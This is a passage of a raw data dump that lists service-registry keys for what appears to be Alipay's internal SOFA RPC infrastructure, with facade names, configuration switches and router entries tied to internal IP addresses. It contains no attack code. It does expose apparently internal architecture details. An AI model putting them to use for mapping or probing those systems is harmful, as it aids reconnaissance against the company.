#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.realtimecheckprod.common.facade.AssetMapManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.idpatrol.core.service.bizCoverage.BcGraphService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.mng.ChargeoffConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.paymentCommonQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agdspaydecision.facade.PayDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.spi.OperationConfigCallbackFacade:1.0:channel_operation_strategy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bktranscore.common.service.facade.debitout.zjzf.common.DebitOutTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.191.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@ficcbffweb#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","SOFA_PRC_TRANSMIT_PCREDITSCHEDULE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetnet.common.service.facade.api.AncmServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mainsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:luoshutwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:gfsettleprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.facade.api.InwardPaymentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.biz.shared.log.LogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iris.facade.diagnose.IrisNetDiagnoseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_2110#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.clearingcenter.facade.api.ClearingBusinessRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.PayRevokeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fdp.facade.api.ReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fcrcportal:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antbrain.facade.dingtalk.api.DingTalkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.ParameterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileops.common.service.facade.ConfigChangeServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publictest.facade.dock.CaseProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.QueryFundInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:oasisdatamanager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icsmng.service.facade.user.UserCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocksupervise.common.service.facade.OpsCloudVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.chat.api.MessageReadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@quotstore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.punishcenter.common.service.facade.PunishStrategyRepositoryRefreshService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.134.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inshealthprod.facade.GiftSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mdeviceprod.common.service.facade.query.DeviceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfoprod.common.service.cds.facade.SolutionFilterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:adviceOrderMonitorExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeexprod.facade.ExportConfigMngFacade:1.0:lifeexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.distribution.MiniAppDistributionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.brand.BrandQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gclearingcenter.facade.api.GclearingNettingMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ecoqltprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.biz.promo.assist.rpc.PromotionInfoManagerRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.approval.ApprovalRecordServiceFacade:1.0:fxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ifxquote_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.common.service.facade.api.EventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.BusinessManagementOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.outside.business.LicenseUnloadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:transfercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.planzero.rockcodecore.facade.processorunit.PUStateInfoQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.iotbsp.business.facade.item.ItemQueryFacade:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zpaas.zappinfo.facade.cmdb.CmdbModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.122.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapires.facade.api.PackageModifySyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.common.service.integration.minicore.MiniCoreAppInfoQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhubalipay.smileservice.service.SmileFaceInitTRService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodmng.facade.ssu.SsuArrServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.206.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fcrcportal:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofa-core-demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.prodquery.client.Cache.catalogTree.refreshAllCommonCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuinfos.biz.news.shared.datasync.tag.index.NewsTagIndexService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.channel.ChannelOperationStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.19.29.199#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alcontract.common.service.facade.FlowOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.octopus.core.facade.ServiceInfoQueryFacade:1.0:abilitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.stuff.StuffApplyOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.detailMaxResendLimitEveryDb,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.antha.AnthaCustomizeAlarmDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.mpcard.MPcardConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pccontractprod.common.service.facade.admin.api.ContractSceneAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinpromo.common.service.facade.api.early.EarlyMorningManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.link.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_accountUnfreezeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.manager.facade.SecuritySandboxManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.dispatch.service.AutoQuoteResourceDispatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.OrderRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.client.history.extension.HistorySnapshotFetcherComponent:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.money.api.MoneyConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.AppClassificationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CdpSpaceObjectManageApiService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmcore.common.service.facade.api.MerchantMigrateMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.InvokeFacadeStoreSwitchResource.useMdeductNewVersion,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.trade.PurchaseDetailInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.feature.FindLbsFeatureInCZoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.process.OpenUniformProcessManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.assettrans.facade.api.AssetTransTwoPhaseManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imemberprod.service.facade.api.UserContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.4.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MDEVICEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:minipcodemarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.76.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echannelcenter.common.service.facade.EchannelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exriskcenter.common.service.facade.api.mng.TaskInstanceFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antscheduler.facade.IStreamStatLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cifin:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.amlmatrixplus.biz.rtms.strategy.facade.api.AnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.da.common.service.facade.api.ProductRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.ps.privilege.PrivilegeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.tag.api.PcreditBillAccountTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:antschedulerconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbcheck.common.service.facade.api.JarManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.goldetfprod.common.service.facade.goods.api.EntityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.150.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.service.facade.OraclePaymentInstructionQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdlib.namelist.domain.black.BlackListWriteService:1.0:customer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.allin.facade.KbRuleApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantGzoneQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataProcessService:1.0:fintradecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:publichome_lifeOrderBizCheckProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.CountcoreParserCallBack:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.220.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileappcommon.common.service.facade.baas.SxmMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.common.service.facade.api.EntityDueDiligenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.impl.AipExecutingPayConfigDRMResource.whiteListUserId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instradeprod2.common.service.TradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointQuotaSummaryQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finboss.common.service.facade.contract.ContractFilesManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.punishinfo.PunishInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:clockGatherSensitiveInfoDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecocheck.common.service.facade.IndustryCampusVerityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketmng.common.service.facade.api.manage.ApiFlowControlManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:industrySceneApplyCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.contact.facade.RecommendKeyInfoService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.opsware.rest.BuildpackSofaRestServices#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.octopus.core.facade.ServiceInfoQueryFacade:1.0:developertool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.api.MessageApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditbenefit.facade.api.item.BFItemManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.superapiGzoneTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transferprod.common.service.facade.api.OtmPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rassistcenter.common.service.facade.api.InspectionReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.cust.CompanyOverviewManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.167.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcardcore.common.service.facade.mpcard.MPcardReturnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.activity.CashierActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.OracleRefundInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.endpoint.gwfacade.zhubalipay.zim.ZimDispatchLdcService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.api.service.facade.service.DataStreamJarService:1.0:databus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iriskfaas.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.baas.facade.ProductManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.minicenter.common.service.facade.api.qrcode.QrCodeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.assistinvestigate.core.AiRequireQueryTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.astaralarm.common.service.facade.sac.StarAgentHoneypotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.commandcenter:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.feecharge.common.service.facade.PreChargeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.grayMsgSceneStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smsgw.common.service.facade.SmsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ck:name=com.alipay.zdal.config.groupCluster.emcooperateDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.assetRebalanceReason,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.variable.facade.VariableRelationQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.gzone.task.TaskServiceGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.follow.UserFollowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.datapoint.DataPointQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.prodquery.common.service.api.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mapi.facade.invoke.ExterfaceInvokeV2Facade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gateway.adapterservice.MobileAdapterService:1.0:${plugin_name}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.dcommservice.common.service.facade.UserOrderQueryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.dataset.DataPointService:1.0:securitydatacbackend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.fsc.facade.AiTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.TradeMergeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_O_PROCESSMNG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lowercaseFirst:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.custview.antg.facade.accesstoken.AgMerchantViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.AntVip-JavaClient:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recon.common.service.facade.fund.api.AuditUnconfirmTransVoucherService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterPortalNoticeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.95.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finnet.service.facade.flux.spi.FinnetReceiveService:1.0:exchangecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchprodIndirectMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finorm.biz.facade.api.RiskEventFlowInstanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.BranchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.eventCheckStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antdata.favorite.spi.MetaDataProvider:1.0:mdatraffic_metadata_provider@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasset.common.service.facade.stuff.api.KbCodeTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.FlowProbeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.232.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lego.common.service.facade.data.ProductTreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.tntInst.TntInstMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CdpSyncApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.analyze.common.share.scoreverify.ScoreVerifyService:1.0:uctfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlink.tuling.common.service.api.external.DistributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.252.114#@#DEFAULT_